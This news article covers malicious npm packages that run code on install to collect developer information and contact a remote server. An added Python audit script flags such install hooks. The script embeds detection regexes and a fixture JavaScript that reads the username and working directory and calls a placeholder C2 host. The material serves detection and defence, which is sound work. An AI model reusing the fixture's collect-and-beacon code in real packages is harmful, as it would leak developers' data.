Cybersecurity researchers have discovered a new batch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information.
Software supply chain firm Phylum, which first identified the “test” packages on July 31, 2023, said they “demonstrated increasing functionality and refinement,” hours after which they were removed and re-uploaded under different, legitimate-sounding package names.
While the end goal of the undertaking is not clear, it’s suspected to be a highly targeted campaign aimed at the cryptocurrency sector based on references to modules such as “rocketrefer” and “binarium.”
“The index.js code is spawned in a child process by the preinstall.js file,” the Phylum research team said. “This action is prompted by the postinstall hook defined in the package.json file, which is executed upon package installation. Therefore, the mere act of installing this package initiates the execution of all this code.”
The first step gathers the current operating system username and the current working directory, after which a GET request carrying the collected data is sent to 185.62.57[.]60:8000/http. The exact motivation behind this action is currently unknown, although it’s believed that the information could be used to trigger “unseen server-side behaviors.”
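The two preceding paragraphs describe the install-time chain (a postinstall hook in package.json runs preinstall.js, which spawns index.js, which collects the username and working directory and issues an outbound GET). The script below is an added, defender-side illustration of how to audit a downloaded package directory for exactly that pattern before installing it; it is not Phylum's tooling and not code from the packages in question. The indicator regexes, the throwaway package it writes to a temporary directory, and the `EXAMPLE-C2-PLACEHOLDER` host are all constructed for the example.

```python
"""Audit an npm package directory for install-time lifecycle hooks and
for the behaviours those hooks reach: child-process spawning, identity
and working-directory collection, and outbound HTTP.

Constructed example; the sample package, indicator list and placeholder
host below are illustrative, not the real campaign's files.
"""
import json
import os
import re
import tempfile

# npm runs these scripts automatically during `npm install`.
INSTALL_TIME_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicators keyed to the behaviours the article describes.
INDICATORS = {
    "spawns_child_process": re.compile(
        r"\bchild_process\b|\b(?:spawn|exec|execSync|fork)\s*\("),
    "reads_user_identity": re.compile(
        r"os\.userInfo\s*\(|process\.env\.(?:USER|USERNAME)\b"),
    "reads_working_dir": re.compile(r"process\.cwd\s*\("),
    "outbound_http": re.compile(
        r"\b(?:https?|net)\.(?:get|request|connect)\s*\(|\bfetch\s*\(|"
        r"\d{1,3}(?:\.\d{1,3}){3}:\d+"),
}
# Bare references to other JS files, e.g. "index.js" inside preinstall.js.
JS_FILE_REF = re.compile(r"[\w./-]+\.[cm]?js\b")


def find_install_hooks(manifest):
    """Return {hook: command} for every script npm runs at install time."""
    scripts = manifest.get("scripts") or {}
    return {h: scripts[h] for h in INSTALL_TIME_HOOKS if h in scripts}


def scan_source(text):
    """Return the sorted list of indicator names present in a JS source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def audit_package(pkg_dir):
    """Follow install hooks into the files they reference and scan each one."""
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    hooks = find_install_hooks(manifest)
    queue = [ref for cmd in hooks.values() for ref in JS_FILE_REF.findall(cmd)]
    seen, findings = set(), {}
    while queue:
        rel = queue.pop(0)
        path = os.path.normpath(os.path.join(pkg_dir, rel))
        if rel in seen or not os.path.isfile(path):
            continue
        seen.add(rel)
        with open(path, encoding="utf-8", errors="replace") as fh:
            src = fh.read()
        hits = scan_source(src)
        if hits:
            findings[rel] = hits
        queue.extend(JS_FILE_REF.findall(src))  # transitively reached files
    risky = bool(hooks) and any(
        "outbound_http" in h or "spawns_child_process" in h
        for h in findings.values())
    return {"hooks": hooks, "findings": findings, "risky": risky}


def build_sample_package(root, suspicious):
    """Write a constructed package mirroring the described chain (or a benign one)."""
    pkg = os.path.join(root, "suspicious" if suspicious else "benign")
    os.makedirs(pkg, exist_ok=True)
    if suspicious:
        scripts = {"postinstall": "node preinstall.js"}
        files = {
            "preinstall.js": 'const { spawn } = require("child_process");\n'
                             'spawn(process.execPath, ["index.js"]);\n',
            "index.js": '// constructed fixture with a placeholder host\n'
                        'const os = require("os");\nconst http = require("http");\n'
                        'const info = { user: os.userInfo().username, cwd: process.cwd() };\n'
                        'http.get("http://EXAMPLE-C2-PLACEHOLDER:8000/http", () => {});\n',
        }
    else:
        scripts = {"test": "node test.js"}
        files = {"test.js": 'console.log("ok");\n'}
    with open(os.path.join(pkg, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "sample", "version": "0.0.1", "scripts": scripts}, fh)
    for name, body in files.items():
        with open(os.path.join(pkg, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return pkg


def run_demo():
    """Audit one suspicious and one benign constructed package."""
    with tempfile.TemporaryDirectory() as root:
        return {
            "suspicious": audit_package(build_sample_package(root, True)),
            "benign": audit_package(build_sample_package(root, False)),
        }


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The audit only follows files that the install hooks actually reach, so a package with a postinstall hook but no suspicious reachable code is reported with its hook listed and `risky` false; the string match is a triage signal, not proof of intent, and a reviewer would still read the flagged files.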